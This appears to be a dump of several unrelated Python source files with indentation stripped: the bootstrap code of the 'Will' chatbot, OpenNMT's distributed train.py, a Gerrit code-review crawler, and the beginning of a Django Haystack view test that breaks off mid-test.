for mod in b.split('.'):
if path_name is not None:
path_name = [path_name]
file_name, path_name, description = imp.find_module(mod, path_name)
one_valid_backend = True
show_valid("%s" % b)
except ImportError:
error_message = (
"Generation backend %s is missing. Please either remove it \nfrom config.py "
"or WILL_GENERATION_BACKENDS, or provide it somehow (pip install, etc)."
) % b
puts(colored.red("✗ %s" % b))
puts()
puts(error_message)
puts()
puts(traceback.format_exc())
missing_setting_error_messages.append(error_message)
missing_settings = True
if missing_settings and not one_valid_backend:
puts("")
error(
"Unable to find a valid IO backend - will has no way to talk "
"or listen!\n Quitting now, please look at the above errors!\n"
)
sys.exit(1)
puts()
@yappi_profile(return_callback=yappi_aggregate)
def verify_execution(self):
puts("Verifying Execution backend...")
missing_settings = False
missing_setting_error_messages = []
one_valid_backend = False
if not hasattr(settings, "EXECUTION_BACKENDS"):
settings.EXECUTION_BACKENDS = ["will.backends.execution.all", ]
with indent(2):
for b in settings.EXECUTION_BACKENDS:
try:
path_name = None
for mod in b.split('.'):
if path_name is not None:
path_name = [path_name]
file_name, path_name, description = imp.find_module(mod, path_name)
one_valid_backend = True
show_valid("%s" % b)
except ImportError:
error_message = (
"Execution backend %s is missing. Please either remove it \nfrom config.py "
"or WILL_EXECUTION_BACKENDS, or provide it somehow (pip install, etc)."
) % b
puts(colored.red("✗ %s" % b))
puts()
puts(error_message)
puts()
puts(traceback.format_exc())
missing_setting_error_messages.append(error_message)
missing_settings = True
if missing_settings and not one_valid_backend:
puts("")
error(
"Unable to find a valid IO backend - will has no way to talk "
"or listen!\n Quitting now, please look at the above errors!\n"
)
sys.exit(1)
puts()
@yappi_profile(return_callback=yappi_aggregate)
def bootstrap_execution(self):
missing_setting_error_messages = []
self.execution_backends = []
self.running_execution_threads = []
execution_backends = getattr(settings, "EXECUTION_BACKENDS", ["will.backends.execution.all", ])
for b in execution_backends:
module = import_module(b)
for class_name, cls in inspect.getmembers(module, predicate=inspect.isclass):
try:
if (
hasattr(cls, "is_will_execution_backend")
and cls.is_will_execution_backend
and class_name != "ExecutionBackend"
):
c = cls(bot=self)
self.execution_backends.append(c)
show_valid("Execution: %s Backend started." % cls.__name__)
except ImportError:
error_message = (
"Execution backend %s is missing. Please either remove it \nfrom config.py "
"or WILL_EXECUTION_BACKENDS, or provide it somehow (pip install, etc)."
) % settings.EXECUTION_BACKENDS
puts(colored.red("✗ %s" % settings.EXECUTION_BACKENDS))
puts()
puts(error_message)
puts()
puts(traceback.format_exc())
missing_setting_error_messages.append(error_message)
if len(self.execution_backends) == 0:
puts("")
error(
"Unable to find a valid execution backend - will has no way to make decisions!"
"\n Quitting now, please look at the above error!\n"
)
sys.exit(1)
@yappi_profile(return_callback=yappi_aggregate)
def verify_plugin_settings(self):
puts("Verifying settings requested by plugins...")
missing_settings = False
missing_setting_error_messages = []
with indent(2):
for name, meta in self.required_settings_from_plugins.items():
if not hasattr(settings, name):
error_message = (
"%(setting_name)s is missing. It's required by the"
"%(plugin_name)s plugin's '%(function_name)s' method."
) % meta
puts(colored.red("✗ %(setting_name)s" % meta))
missing_setting_error_messages.append(error_message)
missing_settings = True
else:
show_valid("%(setting_name)s" % meta)
if missing_settings:
puts("")
warn(
"Will is missing settings required by some plugins. "
"He's starting up anyway, but you will run into errors"
" if you try to use those plugins!"
)
self.add_startup_error("\n".join(missing_setting_error_messages))
else:
puts("")
def handle_sys_exit(self, *args, **kwargs):
# if not self.exiting:
try:
sys.stdout.write("\n\nReceived shutdown, quitting threads.")
sys.stdout.flush()
self.exiting = True
if "WILL_EPHEMERAL_SECRET_KEY" in os.environ:
os.environ["WILL_SECRET_KEY"] = ""
os.environ["WILL_EPHEMERAL_SECRET_KEY"] = ""
if hasattr(self, "scheduler_thread") and self.scheduler_thread:
try:
self.scheduler_thread.terminate()
except KeyboardInterrupt:
pass
if hasattr(self, "bottle_thread") and self.bottle_thread:
try:
self.bottle_thread.terminate()
except KeyboardInterrupt:
pass
if hasattr(self, "incoming_event_thread") and self.incoming_event_thread:
try:
self.incoming_event_thread.terminate()
except KeyboardInterrupt:
pass
# if self.stdin_listener_thread:
# self.stdin_listener_thread.terminate()
self.publish("system.terminate", {})
if hasattr(self, "analysis_threads") and self.analysis_threads:
for t in self.analysis_threads:
try:
t.terminate()
except KeyboardInterrupt:
pass
if hasattr(self, "generation_threads") and self.generation_threads:
for t in self.generation_threads:
try:
t.terminate()
except KeyboardInterrupt:
pass
if hasattr(self, "running_execution_threads") and self.running_execution_threads:
for t in self.running_execution_threads:
try:
t.terminate()
except KeyboardInterrupt:
pass
except:
print("\n\n\nException while exiting!!")
import traceback
traceback.print_exc()
sys.exit(1)
while (
(hasattr(self, "scheduler_thread") and self.scheduler_thread and self.scheduler_thread and self.scheduler_thread.is_alive())
or (hasattr(self, "scheduler_thread") and self.scheduler_thread and self.bottle_thread and self.bottle_thread.is_alive())
or (hasattr(self, "scheduler_thread") and self.scheduler_thread and self.incoming_event_thread and self.incoming_event_thread.is_alive())
# or self.stdin_listener_thread.is_alive()
or any([t.is_alive() for t in self.io_threads])
or any([t.is_alive() for t in self.analysis_threads])
or any([t.is_alive() for t in self.generation_threads])
or any([t.is_alive() for t in self.running_execution_threads])
# or
# ("hipchat" in settings.CHAT_BACKENDS and xmpp_thread and xmpp_thread.is_alive())
):
sys.stdout.write(".")
sys.stdout.flush()
time.sleep(0.5)
print(". done.\n")
sys.exit(1)
@yappi_profile(return_callback=yappi_aggregate)
def bootstrap_event_handler(self):
self.analysis_timeout = getattr(settings, "ANALYSIS_TIMEOUT_MS", 2000)
self.generation_timeout = getattr(settings, "GENERATION_TIMEOUT_MS", 2000)
self.pubsub.subscribe(["message.*", "analysis.*", "generation.*"])
# TODO: change this to the number of running analysis threads
num_analysis_threads = len(settings.ANALYZE_BACKENDS)
num_generation_threads = len(settings.GENERATION_BACKENDS)
analysis_threads = {}
generation_threads = {}
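        # Event pipeline (summarising the handlers below): an IO backend
        # publishes "message.incoming"; the event is fanned out to the analysis
        # backends via "analysis.start"; once every analysis backend has replied
        # (or the analysis timeout passes) the enriched event is fanned out via
        # "generation.start"; once generation completes (or times out) the
        # accumulated generation_options are handed to the execution backends.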
while True:
try:
event = self.pubsub.get_message()
if event and hasattr(event, "type"):
now = datetime.datetime.now()
logging.info("%s - %s" % (event.type, event.original_incoming_event_hash))
logging.debug("\n\n *** Event (%s): %s\n\n" % (event.type, event))
# TODO: Order by most common.
if event.type == "message.incoming":
# A message just got dropped off one of the IO Backends.
# Send it to analysis.
analysis_threads[event.original_incoming_event_hash] = {
"count": 0,
"timeout_end": now + datetime.timedelta(seconds=self.analysis_timeout / 1000),
"original_incoming_event": event,
"working_event": event,
}
self.pubsub.publish("analysis.start", event.data.original_incoming_event, reference_message=event)
elif event.type == "analysis.complete":
q = analysis_threads[event.original_incoming_event_hash]
q["working_event"].update({"analysis": event.data})
q["count"] += 1
logging.info("Analysis for %s: %s/%s" % (event.original_incoming_event_hash, q["count"], num_analysis_threads))
if q["count"] >= num_analysis_threads or now > q["timeout_end"]:
# done, move on.
generation_threads[event.original_incoming_event_hash] = {
"count": 0,
"timeout_end": (
now + datetime.timedelta(seconds=self.generation_timeout / 1000)
),
"original_incoming_event": q["original_incoming_event"],
"working_event": q["working_event"],
}
try:
del analysis_threads[event.original_incoming_event_hash]
except:
pass
self.pubsub.publish("generation.start", q["working_event"], reference_message=q["original_incoming_event"])
elif event.type == "generation.complete":
q = generation_threads[event.original_incoming_event_hash]
if not hasattr(q["working_event"], "generation_options"):
q["working_event"].generation_options = []
if hasattr(event, "data") and len(event.data) > 0:
for d in event.data:
q["working_event"].generation_options.append(d)
q["count"] += 1
logging.info("Generation for %s: %s/%s" % (event.original_incoming_event_hash, q["count"], num_generation_threads))
if q["count"] >= num_generation_threads or now > q["timeout_end"]:
# done, move on to execution.
for b in self.execution_backends:
try:
logging.info("Executing for %s on %s" % (b, event.original_incoming_event_hash))
b.handle_execution(q["working_event"])
except:
logging.critical(
"Error running %s for %s. \n\n%s\nContinuing...\n" % (
b,
event.original_incoming_event_hash,
traceback.format_exc()
)
)
break
try:
del generation_threads[event.original_incoming_event_hash]
except:
pass
elif event.type == "message.no_response":
logging.info("Publishing no response for %s" % (event.original_incoming_event_hash,))
logging.info(event.data.__dict__)
try:
self.publish("message.outgoing.%s" % event.data.backend, event)
except:
logging.critical(
"Error publishing no_response for %s. \n\n%s\nContinuing...\n" % (
event.original_incoming_event_hash,
traceback.format_exc()
)
)
pass
elif event.type == "message.not_allowed":
logging.info("Publishing not allowed for %s" % (event.original_incoming_event_hash,))
try:
self.publish("message.outgoing.%s" % event.data.backend, event)
except:
logging.critical(
"Error publishing not_allowed for %s. \n\n%s\nContinuing...\n" % (
event.original_incoming_event_hash,
traceback.format_exc()
)
)
pass
else:
self.sleep_for_event_loop()
# except KeyError:
# pass
except:
logging.exception("Error handling message")
@yappi_profile(return_callback=yappi_aggregate)
def bootstrap_storage_mixin(self):
puts("Bootstrapping storage...")
try:
self.bootstrap_storage()
# Make sure settings are there.
self.storage.verify_settings()
with indent(2):
show_valid("Bootstrapped!")
puts("")
except ImportError:
module_name = traceback.format_exc().split(" ")[-1]
error("Unable to bootstrap storage - attempting to load %s" % module_name)
puts(traceback.format_exc())
sys.exit(1)
except Exception:
error("Unable to bootstrap storage!")
puts(traceback.format_exc())
sys.exit(1)
@yappi_profile(return_callback=yappi_aggregate)
def bootstrap_pubsub_mixin(self):
puts("Bootstrapping pubsub...")
try:
self.bootstrap_pubsub()
# Make sure settings are there.
self.pubsub.verify_settings()
with indent(2):
show_valid("Bootstrapped!")
puts("")
except ImportError:
module_name = traceback.format_exc().split(" ")[-1]
error("Unable to bootstrap pubsub - attempting to load %s" % module_name)
puts(traceback.format_exc())
sys.exit(1)
except Exception:
error("Unable to bootstrap pubsub!")
puts(traceback.format_exc())
sys.exit(1)
@yappi_profile(return_callback=yappi_aggregate)
def bootstrap_scheduler(self):
bootstrapped = False
try:
self.save("plugin_modules_library", self._plugin_modules_library)
Scheduler.clear_locks(self)
self.scheduler = Scheduler()
for plugin_info, fn, function_name in self.periodic_tasks:
meta = fn.will_fn_metadata
self.add_periodic_task(
plugin_info["full_module_name"],
plugin_info["name"],
function_name,
meta["sched_args"],
meta["sched_kwargs"],
meta["function_name"],
)
for plugin_info, fn, function_name in self.random_tasks:
meta = fn.will_fn_metadata
self.add_random_tasks(
plugin_info["full_module_name"],
plugin_info["name"],
function_name,
meta["start_hour"],
meta["end_hour"],
meta["day_of_week"],
meta["num_times_per_day"]
)
bootstrapped = True
except Exception as e:
self.startup_error("Error bootstrapping scheduler", e)
if bootstrapped:
show_valid("Scheduler started.")
self.scheduler.start_loop(self)
@yappi_profile(return_callback=yappi_aggregate)
def bootstrap_bottle(self):
bootstrapped = False
try:
for cls, function_name in self.bottle_routes:
instantiated_cls = cls(bot=self)
instantiated_fn = getattr(instantiated_cls, function_name)
bottle_route_args = {}
for k, v in instantiated_fn.will_fn_metadata.items():
if "bottle_" in k and k != "bottle_route":
bottle_route_args[k[len("bottle_"):]] = v
bottle.route(instantiated_fn.will_fn_metadata["bottle_route"], **bottle_route_args)(instantiated_fn)
bootstrapped = True
except Exception as e:
self.startup_error("Error bootstrapping bottle", e)
if bootstrapped:
show_valid("Web server started at %s." % (settings.PUBLIC_URL,))
bottle.run(host='0.0.0.0', port=settings.HTTPSERVER_PORT, server='cherrypy', quiet=True)
@yappi_profile(return_callback=yappi_aggregate)
def bootstrap_io(self):
# puts("Bootstrapping IO...")
self.has_stdin_io_backend = False
self.io_backends = []
self.io_threads = []
self.stdin_io_backends = []
for b in self.valid_io_backends:
module = import_module(b)
for class_name, cls in inspect.getmembers(module, predicate=inspect.isclass):
try:
if (
hasattr(cls, "is_will_iobackend")
and cls.is_will_iobackend
and class_name != "IOBackend"
and class_name != "StdInOutIOBackend"
):
c = cls()
if hasattr(c, "stdin_process") and c.stdin_process:
thread = Process(
target=c._start,
args=(b,),
)
thread.start()
self.has_stdin_io_backend = True
self.io_threads.append(thread)
else:
thread = Process(
target=c._start,
args=(
b,
)
)
thread.start()
self.io_threads.append(thread)
show_valid("IO: %s Backend started." % cls.friendly_name)
except Exception as e:
self.startup_error("Error bootstrapping %s io" % b, e)
self.io_backends.append(b)
@yappi_profile(return_callback=yappi_aggregate)
def bootstrap_analysis(self):
self.analysis_backends = []
self.analysis_threads = []
for b in settings.ANALYZE_BACKENDS:
module = import_module(b)
for class_name, cls in inspect.getmembers(module, predicate=inspect.isclass):
try:
if (
hasattr(cls, "is_will_analysisbackend")
and cls.is_will_analysisbackend
and class_name != "AnalysisBackend"
):
c = cls()
thread = Process(
target=c.start,
args=(b,),
kwargs={"bot": self},
)
thread.start()
self.analysis_threads.append(thread)
show_valid("Analysis: %s Backend started." % cls.__name__)
except Exception as e:
self.startup_error("Error bootstrapping %s io" % b, e)
self.analysis_backends.append(b)
pass
@yappi_profile(return_callback=yappi_aggregate)
def bootstrap_generation(self):
self.generation_backends = []
self.generation_threads = []
for b in settings.GENERATION_BACKENDS:
module = import_module(b)
for class_name, cls in inspect.getmembers(module, predicate=inspect.isclass):
try:
if (
hasattr(cls, "is_will_generationbackend")
and cls.is_will_generationbackend
and class_name != "GenerationBackend"
):
c = cls()
thread = Process(
target=c.start,
args=(b,),
kwargs={"bot": self},
)
thread.start()
self.generation_threads.append(thread)
show_valid("Generation: %s Backend started." % cls.__name__)
except Exception as e:
self.startup_error("Error bootstrapping %s io" % b, e)
self.generation_backends.append(b)
pass
@yappi_profile(return_callback=yappi_aggregate)
def bootstrap_plugins(self):
puts("Bootstrapping plugins...")
OTHER_HELP_HEADING = "Other"
plugin_modules = {}
plugin_modules_library = {}
# NOTE: You can't access self.storage here, or it will deadlock when the threads try to access redis.
with indent(2):
parent_help_text = None
for plugin_name, plugin_root in self.plugins_dirs.items():
for root, dirs, files in os.walk(plugin_root, topdown=False):
for f in files:
if f[-3:] == ".py" and f != "__init__.py":
try:
module_path = os.path.join(root, f)
path_components = module_path.split(os.sep)
module_name = path_components[-1][:-3]
full_module_name = ".".join(path_components)
# Check blacklist.
blacklisted = False
for b in settings.PLUGIN_BLACKLIST:
if b in full_module_name:
blacklisted = True
break
parent_mod = path_components[-2].split("/")[-1]
parent_help_text = parent_mod.title()
# Don't even *try* to load a blacklisted module.
if not blacklisted:
try:
plugin_modules[full_module_name] = imp.load_source(module_name, module_path)
parent_root = os.path.join(root, "__init__.py")
parent = imp.load_source(parent_mod, parent_root)
parent_help_text = getattr(parent, "MODULE_DESCRIPTION", parent_help_text)
except:
# If it's blacklisted, don't worry if this blows up.
if blacklisted:
pass
else:
raise
plugin_modules_library[full_module_name] = {
"full_module_name": full_module_name,
"file_path": module_path,
"name": module_name,
"parent_name": plugin_name,
"parent_module_name": parent_mod,
"parent_help_text": parent_help_text,
"blacklisted": blacklisted,
}
except Exception as e:
self.startup_error("Error loading %s" % (module_path,), e)
self.plugins = []
for name, module in plugin_modules.items():
try:
for class_name, cls in inspect.getmembers(module, predicate=inspect.isclass):
try:
if hasattr(cls, "is_will_plugin") and cls.is_will_plugin and class_name != "WillPlugin":
self.plugins.append({
"name": class_name,
"class": cls,
"module": module,
"full_module_name": name,
"parent_name": plugin_modules_library[name]["parent_name"],
"parent_path": plugin_modules_library[name]["file_path"],
"parent_module_name": plugin_modules_library[name]["parent_module_name"],
"parent_help_text": plugin_modules_library[name]["parent_help_text"],
"blacklisted": plugin_modules_library[name]["blacklisted"],
})
except Exception as e:
self.startup_error("Error bootstrapping %s" % (class_name,), e)
except Exception as e:
self.startup_error("Error bootstrapping %s" % (name,), e)
self._plugin_modules_library = plugin_modules_library
# Sift and Sort.
self.message_listeners = {}
self.periodic_tasks = []
self.random_tasks = []
self.bottle_routes = []
self.all_listener_regexes = []
self.help_modules = {}
self.help_modules[OTHER_HELP_HEADING] = []
self.some_listeners_include_me = False
self.plugins.sort(key=operator.itemgetter("parent_module_name"))
self.required_settings_from_plugins = {}
last_parent_name = None
for plugin_info in self.plugins:
try:
if last_parent_name != plugin_info["parent_help_text"]:
friendly_name = "%(parent_help_text)s " % plugin_info
module_name = " %(parent_name)s" % plugin_info
# Justify
friendly_name = friendly_name.ljust(50, '-')
module_name = module_name.rjust(40, '-')
puts("")
puts("%s%s" % (friendly_name, module_name))
last_parent_name = plugin_info["parent_help_text"]
with indent(2):
plugin_name = plugin_info["name"]
plugin_warnings = []
# Just a little nicety
if plugin_name[-6:] == "Plugin":
plugin_name = plugin_name[:-6]
if plugin_info["blacklisted"]:
puts("✗ %s (blacklisted)" % plugin_name)
else:
plugin_instances = {}
for function_name, fn in inspect.getmembers(
plugin_info["class"],
predicate=lambda x: inspect.ismethod(x) or inspect.isfunction(x)
):
try:
# Check for required_settings
with indent(2):
if hasattr(fn, "will_fn_metadata"):
meta = fn.will_fn_metadata
if "warnings" in meta:
plugin_warnings.append(meta["warnings"])
if "required_settings" in meta:
for s in meta["required_settings"]:
self.required_settings_from_plugins[s] = {
"plugin_name": plugin_name,
"function_name": function_name,
"setting_name": s,
}
if (
"listens_to_messages" in meta
and meta["listens_to_messages"]
and "listener_regex" in meta
):
# puts("- %s" % function_name)
regex = meta["listener_regex"]
if not meta["case_sensitive"]:
regex = "(?i)%s" % regex
help_regex = meta["listener_regex"]
if meta["listens_only_to_direct_mentions"]:
help_regex = "@%s %s" % (settings.WILL_HANDLE, help_regex)
self.all_listener_regexes.append(help_regex)
if meta["__doc__"]:
pht = plugin_info.get("parent_help_text", None)
if pht:
if pht in self.help_modules:
self.help_modules[pht].append(u"%s" % meta["__doc__"])
else:
self.help_modules[pht] = [u"%s" % meta["__doc__"]]
else:
self.help_modules[OTHER_HELP_HEADING].append(u"%s" % meta["__doc__"])
if meta["multiline"]:
compiled_regex = re.compile(regex, re.MULTILINE | re.DOTALL)
else:
compiled_regex = re.compile(regex)
if plugin_info["class"] in plugin_instances:
instance = plugin_instances[plugin_info["class"]]
else:
instance = plugin_info["class"](bot=self)
plugin_instances[plugin_info["class"]] = instance
full_method_name = "%s.%s" % (plugin_info["name"], function_name)
cleaned_info = copy.copy(plugin_info)
del cleaned_info["module"]
del cleaned_info["class"]
self.message_listeners[full_method_name] = {
"full_method_name": full_method_name,
"function_name": function_name,
"class_name": plugin_info["name"],
"regex_pattern": meta["listener_regex"],
"regex": compiled_regex,
"fn": getattr(instance, function_name),
"args": meta["listener_args"],
"include_me": meta["listener_includes_me"],
"case_sensitive": meta["case_sensitive"],
"multiline": meta["multiline"],
"direct_mentions_only": meta["listens_only_to_direct_mentions"],
"admin_only": meta["listens_only_to_admin"],
"acl": meta["listeners_acl"],
"plugin_info": cleaned_info,
}
if meta["listener_includes_me"]:
self.some_listeners_include_me = True
elif "periodic_task" in meta and meta["periodic_task"]:
# puts("- %s" % function_name)
self.periodic_tasks.append((plugin_info, fn, function_name))
elif "random_task" in meta and meta["random_task"]:
# puts("- %s" % function_name)
self.random_tasks.append((plugin_info, fn, function_name))
elif "bottle_route" in meta:
# puts("- %s" % function_name)
self.bottle_routes.append((plugin_info["class"], function_name))
except Exception as e:
error(plugin_name)
self.startup_error(
"Error bootstrapping %s.%s" % (
plugin_info["class"],
function_name,
), e
)
if len(plugin_warnings) > 0:
show_invalid(plugin_name)
for w in plugin_warnings:
warn(w)
else:
show_valid(plugin_name)
except Exception as e:
self.startup_error("Error bootstrapping %s" % (plugin_info["class"],), e)
self.save("all_listener_regexes", self.all_listener_regexes)
puts("")
|
train.py
|
#!/usr/bin/env python
"""Train models."""
import os
import signal
import torch
import onmt.opts as opts
import onmt.utils.distributed
from onmt.utils.misc import set_random_seed
from onmt.utils.logging import init_logger, logger
from onmt.train_single import main as single_main
from onmt.utils.parse import ArgumentParser
from onmt.inputters.inputter import build_dataset_iter, patch_fields, \
load_old_vocab, old_style_vocab, build_dataset_iter_multiple
from itertools import cycle
def train(opt):
ArgumentParser.validate_train_opts(opt)
ArgumentParser.update_model_opts(opt)
ArgumentParser.validate_model_opts(opt)
set_random_seed(opt.seed, False)
# Load checkpoint if we resume from a previous training.
if opt.train_from:
logger.info('Loading checkpoint from %s' % opt.train_from)
checkpoint = torch.load(opt.train_from,
map_location=lambda storage, loc: storage)
logger.info('Loading vocab from checkpoint at %s.' % opt.train_from)
vocab = checkpoint['vocab']
else:
vocab = torch.load(opt.data + '.vocab.pt')
# check for code where vocab is saved instead of fields
# (in the future this will be done in a smarter way)
if old_style_vocab(vocab):
fields = load_old_vocab(
vocab, opt.model_type, dynamic_dict=opt.copy_attn)
else:
fields = vocab
# patch for fields that may be missing in old data/model
patch_fields(opt, fields)
if len(opt.data_ids) > 1:
train_shards = []
for train_id in opt.data_ids:
shard_base = "train_" + train_id
train_shards.append(shard_base)
train_iter = build_dataset_iter_multiple(train_shards, fields, opt)
else:
if opt.data_ids[0] is not None:
shard_base = "train_" + opt.data_ids[0]
else:
shard_base = "train"
train_iter = build_dataset_iter(shard_base, fields, opt)
nb_gpu = len(opt.gpu_ranks)
if opt.world_size > 1:
queues = []
mp = torch.multiprocessing.get_context('spawn')
semaphore = mp.Semaphore(opt.world_size * opt.queue_size)
# Create a thread to listen for errors in the child processes.
error_queue = mp.SimpleQueue()
error_handler = ErrorHandler(error_queue)
# Train with multiprocessing.
procs = []
for device_id in range(nb_gpu):
q = mp.Queue(opt.queue_size)
queues += [q]
procs.append(mp.Process(target=run, args=(
opt, device_id, error_queue, q, semaphore), daemon=True))
procs[device_id].start()
logger.info(" Starting process pid: %d " % procs[device_id].pid)
error_handler.add_child(procs[device_id].pid)
producer = mp.Process(target=batch_producer,
args=(train_iter, queues, semaphore, opt,),
daemon=True)
producer.start()
error_handler.add_child(producer.pid)
for p in procs:
p.join()
producer.terminate()
elif nb_gpu == 1: # case 1 GPU only
single_main(opt, 0)
else: # case only CPU
single_main(opt, -1)
def batch_producer(generator_to_serve, queues, semaphore, opt):
init_logger(opt.log_file)
set_random_seed(opt.seed, False)
# generator_to_serve = iter(generator_to_serve)
def pred(x):
"""
Filters batches that belong only
to gpu_ranks of current node
"""
for rank in opt.gpu_ranks:
if x[0] % opt.world_size == rank:
return True
generator_to_serve = filter(
pred, enumerate(generator_to_serve))
def next_batch(device_id):
new_batch = next(generator_to_serve)
semaphore.acquire()
return new_batch[1]
b = next_batch(0)
for device_id, q in cycle(enumerate(queues)):
b.dataset = None
if isinstance(b.src, tuple):
b.src = tuple([_.to(torch.device(device_id))
for _ in b.src])
else:
b.src = b.src.to(torch.device(device_id))
b.tgt = b.tgt.to(torch.device(device_id))
b.indices = b.indices.to(torch.device(device_id))
b.alignment = b.alignment.to(torch.device(device_id)) \
if hasattr(b, 'alignment') else None
b.src_map = b.src_map.to(torch.device(device_id)) \
if hasattr(b, 'src_map') else None
b.align = b.align.to(torch.device(device_id)) \
if hasattr(b, 'align') else None
b.corpus_id = b.corpus_id.to(torch.device(device_id)) \
if hasattr(b, 'corpus_id') else None
# hack to dodge unpicklable `dict_keys`
b.fields = list(b.fields)
q.put(b)
b = next_batch(device_id)
def run(opt, device_id, error_queue, batch_queue, semaphore):
""" run process """
try:
gpu_rank = onmt.utils.distributed.multi_init(opt, device_id)
if gpu_rank != opt.gpu_ranks[device_id]:
raise AssertionError("An error occurred in \
Distributed initialization")
single_main(opt, device_id, batch_queue, semaphore)
except KeyboardInterrupt:
pass # killed by parent, do nothing
except Exception:
# propagate exception to parent process, keeping original traceback
import traceback
error_queue.put((opt.gpu_ranks[device_id], traceback.format_exc()))
class ErrorHandler(object):
"""A class that listens for exceptions in children processes and propagates
the tracebacks to the parent process."""
def __init__(self, error_queue):
""" init error handler """
import signal
import threading
self.error_queue = error_queue
self.children_pids = []
self.error_thread = threading.Thread(
target=self.error_listener, daemon=True)
self.error_thread.start()
signal.signal(signal.SIGUSR1, self.signal_handler)
def add_child(self, pid):
""" error handler """
self.children_pids.append(pid)
def error_listener(self):
""" error listener """
(rank, original_trace) = self.error_queue.get()
self.error_queue.put((rank, original_trace))
os.kill(os.getpid(), signal.SIGUSR1)
def signal_handler(self, signalnum, stackframe):
""" signal handler """
for pid in self.children_pids:
os.kill(pid, signal.SIGINT) # kill children processes
(rank, original_trace) = self.error_queue.get()
msg = """\n\n-- Tracebacks above this line can probably
be ignored --\n\n"""
msg += original_trace
raise Exception(msg)
def _get_parser():
parser = ArgumentParser(description='train.py')
opts.config_opts(parser)
opts.model_opts(parser)
opts.train_opts(parser)
return parser
def main():
parser = _get_parser()
opt = parser.parse_args()
train(opt)
if __name__ == "__main__":
main()
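# --- Invocation sketch (illustrative; paths are placeholders) ---
# Training is typically launched from the command line with the options parsed
# above, e.g. for a single GPU and preprocessed data shards named data/demo*:
#   python train.py -data data/demo -world_size 1 -gpu_ranks 0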
|
crawl.py
|
import simplejson
import requests
import os
import threading
import config
# projects
projects = ['eclipse', 'libreoffice', 'openstack', 'qt']
# code review state
statuses = ['merged', 'abandoned']
# download dir
download_dir = config.download_dir
# RestAPI Url
urls = config.urls
# number of code reviews downloaded in each step
num_one_step = config.num_one_step
# retrieve all code reviews
def get_changes(project, start_index, status):
if project in urls.keys():
url = urls[project]
url = url + '&q=status:%s&S=%s' % (status, start_index)
print(url)
# Here, we get the byte data, we need to transfer it to string
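        # The slice [4:] strips Gerrit's ")]}'" XSSI-protection prefix, which is
        # prepended to every JSON response from the REST API.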
return requests.get(url).content[4:].decode('utf-8')
return ''
# Code review store path for each project
def project_dir(project, status):
dir_path = os.path.join(download_dir, project)
if not os.path.exists(dir_path):
os.makedirs(dir_path)
status_dir_path = os.path.join(dir_path, status)
if not os.path.exists(status_dir_path):
os.makedirs(status_dir_path)
# make dir for each project
def mkdir_for_projects():
for p in projects:
for s in statuses:
project_dir(p, s)
# remove all logs
def remove_all_logs():
for p in projects:
for s in statuses:
path = p + '-' + s + '.log'
            if os.path.exists(path):
os.remove(path)
def write_file(file_path, message):
file_obj = open(file_path, 'w', encoding='utf-8')
file_obj.write(message)
file_obj.close()
# download threads
def download(project, status, start_index=0, one_step=100):
print(project + ": " + status + " download")
has_more = True
dir_path = os.path.join(download_dir, project, status)
# Log file initialization
logfile_name = config.log_path(project, status)
log_obj = open(logfile_name, 'a+')
log_obj.write('start log\n')
try_num = 3
while has_more:
file_name = '%s-%s.json' % (start_index, start_index + num_one_step - 1)
file_path = os.path.join(dir_path, file_name)
try:
if os.path.exists(file_path):
start_index = start_index + one_step
continue
changes_str = get_changes(project, start_index, status)
except:
if try_num > 0:
try_num = try_num - 1
else:
try_num = 3
log_message = '%s %s %s to %s exception!' % (
project, status, start_index, start_index + num_one_step - 1)
print(log_message)
log_obj.write(log_message + '\n')
start_index = start_index + one_step
            continue
change_dict_list = simplejson.loads(changes_str)
if len(change_dict_list) == 0:
break
# length less than number of step, indicate the code review download complete
if len(change_dict_list) < num_one_step:
break
write_file(file_path, changes_str)
log_message = '%s %s %s to %s has downloaded!' % (project, status, start_index, start_index+num_one_step-1)
log_obj.write(log_message+'\n')
print(log_message)
start_index = start_index + one_step
log_obj.write('end log\n')
print(project + " end")
log_obj.close()
if __name__ == '__main__':
mkdir_for_projects()
remove_all_logs()
# create thread for each project and each state
for p in projects:
for s in statuses:
t = threading.Thread(target=download, args=(p, s, 0, 100,))
t.start()
|
test_views.py
|
import queue
import time
from threading import Thread
from django import forms
from django.http import HttpRequest, QueryDict
from django.test import TestCase, override_settings
from django.urls import reverse
from test_haystack.core.models import AnotherMockModel, MockModel
from haystack import connections, indexes
from haystack.forms import FacetedSearchForm, ModelSearchForm, SearchForm
from haystack.query import EmptySearchQuerySet
from haystack.utils.loading import UnifiedIndex
from haystack.views import FacetedSearchView, SearchView, search_view_factory
class InitialedSearchForm(SearchForm):
q = forms.CharField(initial="Search for...", required=False, label="Search")
class BasicMockModelSearchIndex(indexes.BasicSearchIndex, indexes.Indexable):
def get_model(self):
return MockModel
class BasicAnotherMockModelSearchIndex(indexes.BasicSearchIndex, indexes.Indexable):
def get_model(self):
return AnotherMockModel
class SearchViewTestCase(TestCase):
fixtures = ["base_data"]
def setUp(self):
super().setUp()
# Stow.
self.old_unified_index = connections["default"]._index
self.ui = UnifiedIndex()
self.bmmsi = BasicMockModelSearchIndex()
self.bammsi = BasicAnotherMockModelSearchIndex()
self.ui.build(indexes=[self.bmmsi, self.bammsi])
connections["default"]._index = self.ui
# Update the "index".
backend = connections["default"].get_backend()
backend.clear()
backend.update(self.bmmsi, MockModel.objects.all())
def tearDown(self):
connections["default"]._index = self.old_unified_index
super().tearDown()
def test_search_no_query(self):
response = self.client.get(reverse("haystack_search"))
self.assertEqual(response.status_code, 200)
def test_search_query(self):
response = self.client.get(reverse("haystack_search"), {"q": "haystack"})
self.assertEqual(response.status_code, 200)
self.assertIn("page", response.context)
self.assertNotIn("page_obj", response.context)
self.assertEqual(len(response.context[-1]["page"].object_list), 3)
self.assertEqual(
response.context[-1]["page"].object_list[0].content_type(), "core.mockmodel"
)
self.assertEqual(response.context[-1]["page"].object_list[0].pk, "1")
def test_invalid_page(self):
response = self.client.get(
reverse("haystack_search"), {"q": "haystack", "page": "165233"}
)
self.assertEqual(response.status_code, 404)
def test_empty_results(self):
sv = SearchView()
sv.request = HttpRequest()
sv.form = sv.build_form()
self.assertTrue(isinstance(sv.get_results(), EmptySearchQuerySet))
def test_initial_data(self):
sv = SearchView(form_class=InitialedSearchForm)
sv.request = HttpRequest()
form = sv.build_form()
self.assertTrue(isinstance(form, InitialedSearchForm))
self.assertEqual(form.fields["q"].initial, "Search for...")
para = form.as_p()
self.assertTrue('<label for="id_q">Search:</label>' in para)
self.assertTrue('value="Search for..."' in para)
def test_pagination(self):
response = self.client.get(
reverse("haystack_search"), {"q": "haystack", "page": 0}
)
self.assertEqual(response.status_code, 404)
response = self.client.get(
